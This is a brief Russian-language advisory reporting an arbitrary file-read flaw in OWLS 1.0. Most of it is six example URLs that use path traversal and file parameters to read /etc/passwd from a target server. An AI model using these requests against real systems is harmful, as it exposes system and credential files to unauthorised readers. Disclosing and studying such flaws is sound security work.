Программа: Owl Workshop for Language Study (OWLS) 1.0 

Уязвимость обнаружена в Owl's Workshop for Language Study (OWLS). Удаленный пользователь может просматривать произвольные файлы на целевой системе. 

Пример: 

http://[target]/owls/ glossaries/index.php?file=/etc/passwd

http://[target]/owls/ multiplechoice/index.php?file=
../../../../../../../../../../../../../.. /../etc/passwd&view=print

http://[target]/owls/readings/ index.php?filename=/etc/passwd

http://[target]/owls/multiplechoice/ resultsignore.php?filename=/etc/passwd

http://[target]/owls/workshop/ glossary.php?editfile=../../../../../../../../../../
../../../../. ./etc/passwd

http://[target]/owls/workshop/ newmultiplechoice.php?edit=1&editfile=
../../../../../../../../../../../ ../../../../etc/passwd

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии